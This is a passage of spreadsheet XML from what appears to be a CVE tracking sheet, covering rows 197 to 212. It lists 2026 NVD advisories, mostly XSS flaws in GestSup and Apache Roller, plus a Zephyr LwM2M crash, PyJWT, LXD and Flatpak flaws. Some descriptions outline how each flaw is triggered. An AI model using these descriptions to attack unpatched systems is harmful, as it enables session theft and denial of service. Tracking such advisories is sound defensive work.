      <c r="H197" s="5" t="inlineStr"/>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S197" s="5" t="inlineStr">
        <is>
          <t>GestSup versions before 3.2.62 fail to properly sanitize HTML email bodies in the IMAP LOGIN connector, allowing unauthenticated attackers to store arbitrary JavaScript in ticket descriptions and replies. Attackers can send emails to the monitored mailbox containing script tags and event handlers that execute in technician browsers, enabling ticket data theft and unauthorized actions.</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102372</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102374</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="inlineStr"/>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S198" s="5" t="inlineStr">
        <is>
          <t>GestSup versions before 3.2.62 contain a stored cross-site scripting vulnerability in the IMAP OAuth connector that double-decodes MIME-encoded email subjects after HTML escaping. Unauthenticated attackers can send crafted emails to monitored mailboxes with nested MIME encoded-words to inject JavaScript that executes in technician sessions when viewing tickets.</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102374</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82382</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="inlineStr"/>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Apache Roller 6.1.5 allows a remote attacker to perform reflected cross-site scripting against a visitor to a weblog using the bundled frontpage theme, by supplying a crafted blog-directory parameter that the directory page reflects without proper escaping. This affects only weblogs that use the bundled frontpage theme, and a victim must follow a crafted link for the script to execute. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which validates and contextually escapes the reflected parameter.</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82382</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82546</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="inlineStr"/>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Apache Roller 6.1.5 allows an unauthenticated remote attacker to store a crafted comment-author URL through the incoming Trackback endpoint when a published entry accepts comments and Trackbacks. The shipped Trackback, verification and moderation defaults allow the value to be approved and rendered as an active link; a visitor who clicks the link executes script in the weblog's origin. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which removes incoming Trackback support and suppresses non-HTTP(S) comment-author links. Users unable to upgrade should disable Trackbacks and remove untrusted Trackback comments.</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82546</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86507</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="inlineStr"/>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S201" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input in Apache Roller 6.1.5 allows an anonymous remote attacker to store a crafted comment-author URL that can execute script in the session of a weblog moderator or global administrator when the comment management page is viewed. This affects sites that permit comments on at least one weblog and whose moderator subsequently reviews the submitted comment; no non-default server setting is required. Users are recommended to upgrade to Apache Roller 6.1.6 or later.</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86507</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87752</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="inlineStr"/>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S202" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Rolantis Information Technologies Tourism Industry and Trade Co. Ltd. Agentis allows XSS Targeting HTML Attributes.
This issue affects Agentis: from 4.44 before 4.6.</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87752</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91204</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="inlineStr"/>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S203" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Apache Roller 6.1.5 allows an anonymous remote attacker to store a comment containing a javascript: URI link that survives HTML comment formatting and can execute script in the browser of a visitor who clicks it. This affects only sites that enable HTML in comments (users.comments.htmlenabled=true) together with the HTMLSubset comment formatter; comment moderation, where enabled, delays publication. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which restricts restored links to http, https and mailto URIs.</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91204</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91206</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="inlineStr"/>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S204" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Apache Roller 6.1.5 allows a remote attacker to perform reflected cross-site scripting through the optional LDAP comment authenticator, which writes request parameter values into its HTML form without escaping. This affects only sites configured to use LdapCommentAuthenticator, and a victim whose session has already loaded the authenticator form must follow a crafted link. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which escapes the reflected values.</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91206</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82933</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr"/>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t>mH-DEVELOPER smart home module sends its web interface and API traffic over unencrypted HTTP. Passwords, authentication tokens, and device commands are transmitted in cleartext. An attacker on the same network can intercept this traffic, steal credentials and tokens, and hijack sessions.
This issue was fixed in version 3.0.30</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82933</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102274</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="inlineStr"/>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S206" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.9.0 until 2.14.0, PyJWKSet does not catch the plain ValueError raised for malformed RSA JWK components by RSAAlgorithm.from_jwk in  jwt/api_jwk.py. This occurs when a JWK Set contains a malformed RSA key alongside otherwise usable keys. As a result, one malformed member aborts construction of the entire PyJWKSet. Consequently, applications can experience authentication failures or request-level denial of service. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102274</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18746</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="inlineStr"/>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr">
        <is>
          <t>requests, rust</t>
        </is>
      </c>
      <c r="K207" s="5" t="inlineStr"/>
      <c r="L207" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S207" s="5" t="inlineStr">
        <is>
          <t>parse_write_op() in subsys/net/lib/lwm2m/lwm2m_message_handling.c handles inbound CoAP WRITE/CREATE requests that carry a Block1 option. For the first block of a transfer it called init_block_ctx() and then immediately stored the peer-selected block size with block_ctx-&gt;ctx.block_size = block_size before inspecting the return code. init_block_ctx() sets the caller's pointer to NULL and returns -ENOMEM when no entry of the static block1_contexts[] pool is free or timed out, so that store dereferences a NULL pointer.
The pool holds CONFIG_LWM2M_NUM_BLOCK1_CONTEXT entries (default 3) and an entry is only reclaimed once its transfer completes, fails, or ages past 30 seconds. A peer that reaches the client's LwM2M socket can therefore start three block-wise writes on three distinct object paths with the CoAP More bit set and leave them incomplete, then send the first block of a fourth write on a new path to reach the unguarded dereference. Reachability is gated only by the connected UDP socket's source-address filter unless CONFIG_LWM2M_DTLS_SUPPORT is enabled — which has no default — so in a NoSec deployment an on-path or address-spoofing attacker needs no credentials; the same sequence is also reachable from a bootstrap or lower-trust server, and can be hit accidentally by a legitimate server running four concurrent block transfers.
The write targets a fixed low address with a value between 0 and 7, so the consequence is a fatal memory fault (BusFault or corrupted low memory leading to a fault) rather than a usable memory-corruption primitive: the device crashes or resets. Confidentiality and integrity are not affected. The fix moves the store below the guard and validates the context pointer itself instead of the return code, so the context is only touched once it is known to be valid.</t>
        </is>
      </c>
      <c r="T207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18746</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82936</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S208" s="5" t="inlineStr">
        <is>
          <t>mH-DEVELOPER smart home module is vulnerable to Denial of Service due to uncontrolled resource consumption. The Express bodyParser is configured with a 250 MB limit for JSON and URL-encoded request bodies. An authenticated attacker on the LAN can send large request bodies that exhausts buffers in RAM, causing out-of-memory conditions and crashing the fh-node process, resulting in denial of service. The successful attack depends on the current memory usage of the device which is not under full control of the attacker. Critically, due to CVE-2026-82930 all endpoints can be queried unauthenticated, so any user on LAN can perform this attack.
This issue was fixed in version 3.0.30</t>
        </is>
      </c>
      <c r="T208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82936</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87798</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S209" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution in the recursive file pull feature of the LXD CLI client in Canonical LXD versions 4.0.2 up to 6.9 (fixed in 4.0.14, 5.0.10 and 5.21.8) on Linux allows an attacker with root access inside a virtual machine to write attacker-controlled files or directory trees to arbitrary paths on the client host, with the operator's privileges. The attacker does this by using a modified lxd-agent that returns inconsistent SFTP directory listings and Lstat results.</t>
        </is>
      </c>
      <c r="T209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87798</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97029</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>CWE-653</t>
        </is>
      </c>
      <c r="S210" s="5" t="inlineStr">
        <is>
          <t>Flatpak's process ID namespace separation does not prevent a sandboxed app's kill(0, signal) or killpg(0, signal) calls from reaching processes outside the sandbox that share the same process group. A malicious or compromised Flatpak app can use this to cause denial of service by terminating processes outside its sandbox, such as the desktop shell.</t>
        </is>
      </c>
      <c r="T210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97029</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15953</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>cybersecurity@ch.abb.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in ABB Protection and control IED manager (PCM600).
This issue affects Protection and control IED manager (PCM600): through 2.14.</t>
        </is>
      </c>
      <c r="T211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15953</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70413</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
